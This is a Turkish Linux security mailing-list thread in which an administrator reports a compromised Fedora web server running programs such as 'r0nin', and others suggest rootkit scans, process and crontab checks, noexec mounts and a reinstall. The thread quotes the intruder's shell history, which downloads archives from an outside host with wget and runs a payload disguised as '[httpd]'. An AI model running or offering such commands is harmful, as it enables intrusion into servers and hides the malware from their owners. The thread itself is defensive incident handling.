From: huzeyfe@cc.kou.edu.tr
Date: Mon 18 Apr 2005 - 19:48:33 EEST
merhaba,
sorun daha cok web based bir uygulamadan kaynaklaniyor kanimca. Daha once
buna benzer etkilenmis birkac sunucu ile karsilastim. Saldirganin default
davranisi genelde su sekilde oluyor, web based bir uygulamadan nobody'nin
yazabildigi bir yere gerekli yazilimlari indirir. Sistemde farkli bir acik
varsa bunlari dener ve baska bir kullanici ya da root haklari elde etmeye
calisir. Guncellenmemis Linux cekirdekleri bu tip saldirganlarin ilk
ugrayacagi duraktir. Eger sistemde bir hak elde edemezse sunucu sistemi
baska sunucu sistemlere saldiri amacli kullanabilir. Apache'nin loglari
incelenerek sunucu uzerinde yapilmaya calisilanlar belirlenebilir.
> Merhaba,
>
> netstat -tnlp çıktısını gönderebilirseniz aslında daha iyi olur ama
> yine de girebildiklerine göre mutlaka bir executable
> çalıştırıyorlardır. nobody kullanıcısının crontab'ına bakarsanız:
> crontab -u nobody -l
> sanırım birşeyler yüklemiştir. Eğer netstat ile bir port gözükmüyor,
> crontab'da da herhangi bir kayıt yok ise bence işiniz biraz zor çünkü
> muhtamelen root hakkı elde edip ls, who, cd gibi dosyalarınızı
> değiştirmiş olabilir.
>
> bir de netstat ve ps ile çalışan programları incelemenizde yarar var.
> Process ID'lerine göre
> /proc/$PROCESS_ID/cmdline
> dosyalarına bakarsanız, çalışan zararlı programı bulabilirsiniz.
> Ancak bunu bulup silmeniz bilgisayarınızı temizlemeniz anlamına gelmez
> maalesef.
>
> Bu arada tmp dizinlerinin güvenliği için /var/tmp'nin /tmp'ye bir link
> olması ve noexec bağlanması gerekiyor. Bir dahaki kurulumunuzda bunu
> da göz önünde bulundurursunuz.
>
> Bir de eğer PHP-Nuke açığı ile girilmişse root hakkı elde etmesi biraz
> zor gibi.
> /var/tmp/... (üç nokta :))
> dizinine bakmayı bir deneyin, genelde bu şekilde executable'ları
> gizliyorlar.
>
> --
> İlker Erek Duran
> E-posta: ilker.duran@gmail.com
> Icq: 150824206
>
>
> On 4/18/05, The RED <jdred@gmx.net> wrote:
>> chkrootkit ile arattım. Sonuç:
>> Checking `bindshell'... warning, got bogus tcp line.
>> INFECTED (PORTS: 465)
>>
>> sadece bu infected olarak çıktı. bu ne anlama geliyor? bildiğim
>> kadarıyla bu
>> port standart secure smtp portu.
>> diğer kontrollerde bir sorun görünmüyor.
>> netstat -tn ile baktığımda standart portlar dışında aktif bir port
>> görünmüyor.
>>
>> diğer bir tuhaf nokta ise, örneğin şu an sunucuda sadece ben bağlıyım.
>> finger ve w ile de böyle görünüyor. Ancak who ile baktığımda şu anki
>> bağlantım (pts/1) dışında pts/0 şeklinde 3 gün öncesi tarihli bir
>> bağlantı
>> görünüyor. şu şekilde:
>> root pts/0 Apr 15 03:23 (dsl81-215-*****.adsl.ttnet.net.tr)
>> root pts/1 Apr 18 11:18 (dsl81-215-*****.adsl.ttnet.net.tr)
>> iki host (ip) da benim kendi hostum. pts/0'ın görünmesi normal mi?
>>
>> işin en kötü yanı bu bir web sunucu ve yedekleyip başka bir sunucuya
>> taşınması çok zor :(
>> anlaşılan bu programlar en azından son 1 aydır sunucuda çalıştırılıyor
>> zaman
>> zaman.
>> cpu loadının artışı ve arka planda çalışan bu uygulamalar dışında henüz
>> başka bir etkiye (dosya silme, site hackleme vs.) rastlamadım.
>> bu yüzden sunucuyu yeniden yüklemeden temizlemenin yollarını arıyorum.
>>
>> Görüldüğü kadarıyla sunucuya giren kişi /var/tmp/ dizinine telnet ile
>> giriyor ve o dizinde yapıyor yapacağını.
>> /tmp/ ve /var/tmp dizinleri noexec olarak mount edilmemiş malesef.
>> /var/tmp
>> dizininin yetkisini kaldırsam (giren kişinin dosyaları nobody kullanıcı
>> adına bağlı) sadece root'a rwx yetkileri versem bir daha girmesini
>> önlemek
>> açısından bir çözüm olabilir mi? home dizinine ulaşamazsa giremez
>> herhalde?
>>
>> bir de not: sistemde cpanel/whm kontrol paneli yüklü..
>>
>> Teşekkürler.
>>
>> ----- Original Message -----
>> From: "Cem Ahmet MERCAN (HBM)" <mercan@be.itu.edu.tr>
>> To: <linux-guvenlik@liste.linux.org.tr>
>> Sent: Monday, April 18, 2005 2:46 PM
>> Subject: Re: [Linux-guvenlik] r0nin
>>
>> > Merhaba;
>> >
>> > rootkit tarayan programlardan biri ile sisteminizi taramanizi
>> öneririm:
>> > http://www.rootkit.nl/ programini rkhunter -c komutu ile
>> > http://www.chkrootkit.org/ programini ./chkrootkit komutu ile
>> > kullanabilirsiniz.
>> > en azindan hacklendiginizden ve ne tur bir hack yada acik oldugundan
>> > haberiniz olur. Ama sisteminizi bu halde birakmayin, sadece cok
>> gerekli
>> > olan cok az dosyayi bir yere kopyalayip sistemi sifirdan tekrar kurun
>> > derim. Hatta bu sistemden gelen konfigurasyon dosyalariniza bile
>> > guvenmeyin, eger gercekten o dosyaya hakim degilseniz.
>> >
>> > İyi Günler...
>> >
>> > Cem Ahmet MERCAN
>> >
>> >
>> >
>> > The RED wrote:
>> >
>> >>
>> >> /var/tmp dizininde .bash_history oluşmuş. Sunucudaki exploit bir
>> shell
>> >> hesabı açıyor herhalde ve ev dizinini /var/tmp olarak veriyor.
>> Normalde
>> >> hiçbir kullanıcının shell izni yok. (sunucu web sunucu)
>> >> /var/tmp/.bash_history dosyasının içeriği:
>> >>
>> >> e
>> >> w
>> >> /sbin/ifconfig
>> >> w
>> >> cd /var/tmp/.hu
>> >> cd /var/tmp
>> >> mkdir .hu
>> >> cd .hu
>> >> wget powerlock.home.ro/newpas.tgz
>> >> wget powerlock.home.ro/newpass.tgz
>> >> tar zxvf newpass.tgz
>> >> mv newpass [httpd]
>> >> export PATH="."
>> >> [httpd]
>> >>
>> >>
>> >> ----- Original Message ----- From: "The RED" <jdred@gmx.net>
>> >> To: <linux-sunucu@liste.linux.org.tr>
>> >> Sent: Monday, April 18, 2005 1:43 PM
>> >> Subject: Re: [Linux-sunucu] r0nin
>> >>
>> >>
>> >>> Birileri sürekli /tmp ve /var/tmp dizinlerine r0nin vs. gibi
>> dosyalar
>> >>> yerleştirip çalıştırıyorlar. Az önce de "atac" isimli bri şey
>> yüklenmiş
>> >>> ve
>> >>> biraz önce bri atak yapıldı. 200-300 tane çalıştırılmış. ddos atağı
>> >>> yapılıyor herhalde sunucu üzerinden. /var/tmp ve /tmp dizinlerindeki
>> >>> dosyaların çalıştırılmasını nasıl önleyebilirim bilen yok mu??
>> Isletim
>> >>> sistemi: Fedora core 1, kernel 2.4.22-1.2115.nptl,
>> >>
>> >>
>> >>>
>> >>> ----- Original Message ----- From: "The RED" <jdred@gmx.net>
>> >>> To: <linux-sunucu@liste.linux.org.tr>
>> >>> Sent: Monday, April 18, 2005 11:48 AM
>> >>> Subject: [Linux-sunucu] r0nin
>> >>>
>> >>>
>> >>>> merhaba. sunucuma bir süredir r0nin dadandi. daha önce
>> temizlemistim
>> >>>> yeniden
>> >>>> /tmp/ dizini altina girmis. Daha önce de bu dizin altinda r0nin,
>> brk
>> >>>> gibi
>> >>>> şeyler vardi silmistim ama bugün r0nin tekrar o dizinde.
>> >>>> Internetten biraz arastirdim ama yeterli bilgiye rastlayamadim
>> henüz.
>> >>>> Nedir bu r0nin tam olarak? Apache ile ilgili bir açiktan
>> bahsediliyor.
>> >>>> Nasil
>> >>>> bulasiyor? Etkileri (yol açabileceği şeyler) neler ve nasil tam
>> olarak
>> >>>> silinebiliyor? Bilen varsa lütfen yardimci olun.
>> >>>>
>> >>>>
>> >>>
>> >>>
>> >>> --------------------------------------------------------------------------------
>> >>>
>> >>>
>> >>>
>> >>> _______________________________________________
>> >>> Linux-sunucu mailing list
>> >>> Linux-sunucu@liste.linux.org.tr
>> >>> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
>> >>>
>> >>>
>> >>
>> >>
>> >> --------------------------------------------------------------------------------
>> >>
>> >>
>> >>
>> >> _______________________________________________
>> >> Linux-sunucu mailing list
>> >> Linux-sunucu@liste.linux.org.tr
>> >> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
>> >>
>> >>------------------------------------------------------------------------
>> >>
>> >>_______________________________________________
>> >>Linux-guvenlik mailing list
>> >>Linux-guvenlik@liste.linux.org.tr
>> >>http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
>> >>
>> > _______________________________________________
>> > Linux-guvenlik mailing list
>> > Linux-guvenlik@liste.linux.org.tr
>> > http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
>> >
>>
>> _______________________________________________
>> Linux-guvenlik mailing list
>> Linux-guvenlik@liste.linux.org.tr
>> http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
>>
> _______________________________________________
> Linux-guvenlik mailing list
> Linux-guvenlik@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
>
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik